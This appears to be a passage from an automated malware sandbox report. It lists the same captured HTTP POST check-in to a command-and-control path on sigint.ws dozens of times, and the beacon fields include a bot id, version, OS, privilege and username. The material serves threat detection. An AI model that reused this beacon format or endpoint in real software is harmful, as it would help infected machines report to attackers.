                        Source: global traffic HTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: sigint.ws Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 30 37 30 30 31 26 75 6e 69 74 3d 34 32 35 36 32 30 38 38 33 33 39 32 Data Ascii: d1=1000007001&unit=425620883392
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
